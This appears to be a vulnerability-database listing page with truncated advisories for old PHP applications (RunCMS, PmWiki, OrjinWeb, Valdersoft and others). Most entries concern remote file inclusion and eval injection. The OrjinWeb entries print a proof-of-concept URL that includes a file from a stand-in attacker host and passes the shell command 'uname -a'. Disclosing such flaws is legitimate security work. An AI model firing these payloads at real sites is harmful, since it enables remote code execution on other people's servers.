CVE-2006-0659
CVE-2006-0659 concerns multiple PHP remote code execution vulnerabilities in RunCMS 1.2 and earlier, arising when register_globals and allow_url_fopen are enabled. An attacker can trigger arbitrary code execution via the bbPath[path] parameter in (1) class.forumposts.php and (2) forumpollrenderer...
LinPHA 0.9.x/1.0 - forth_stage_install.php Local File Inclusion
LinPHA 0.9.x/1.0 - forth_stage_install.php Local File Inclusion source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once' PHP function in...
Farsinews 2.1/2.5 - show_archives.php?template Traversal Arbitrary File Access
Farsinews 2.1/2.5 - show_archives.php?template Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-suppli...
Farsinews 2.1/2.5 - 'show_archives.php?template' Traversal Arbitrary File Access
source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit the directory-traversal vulnerability to...
CVE-2006-0565
CVE-2006-0565 affects Loudblog 0.4 and earlier. The vulnerability is a PHP remote file include in inc/backend_settings.php that allows an attacker to execute arbitrary PHP code via a URL supplied to the $GLOBALS[path] parameter. The NVD entries describe that remote code execution is possible, wit...
Code injection
Unspecified vulnerability in index.php in a certain application available from /v1/tr/portfoy.php on www.egeinternet.com allows remote attackers to execute arbitrary code via "evilcode" in the key parameter, possibly a PHP remote file include vulnerability in which the attack vector is a URL in t...
CVE-2003-1292
CVE-2003-1292 concerns ashNews 0.83. The vulnerability is a PHP remote file inclusion (RFI) where an attacker can use a URL in the pathtoashnews parameter to ashnews.php and ashheadlines.php to include and execute remote files. Affected software: ashNews 0.83. The CVSS details from NVD indicate a...
PmWiki 2.1 - Multiple Input Validation Vulnerabilities
PmWiki 2.1 - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include...
PmWiki 2.1 - Multiple Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include vulnerability. Exploitation of this issue will result in...
Design/Logic Flaw
Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...
CVE-2006-0214
Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...
CVE-2006-0171
PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE...
orjinweb.txt
Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...
Orjinweb E-commerce
Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...
Remote file include in appserv 2.4.5 (possible in previous versions)
Remote file include in appserv 2.4.5 (possible in previous versions). What is Appserv: AppServ is the Apache/PHP/MySQL open source software installer packages...
CVE-2006-0099
CVE-2006-0099 is a PHP remote file include vulnerability in Valdersoft Shopping Cart 3.0. The flaw occurs in (1) include/templates/categories/default.php and (2) other include/templates/categories/ PHP scripts, where an attacker can cause arbitrary code execution by supplying a crafted URL in the...
EUVD-2006-0107
PHP remote file include vulnerability in (1) include/templates/categories/default.php and (2) certain other include/templates/categories/ PHP scripts in Valdersoft Shopping Cart 3.0 allows remote attackers to execute arbitrary code via a URL in the catalogDocumentRoot parameter...
Design/Logic Flaw
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...
CVE-2006-0094
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...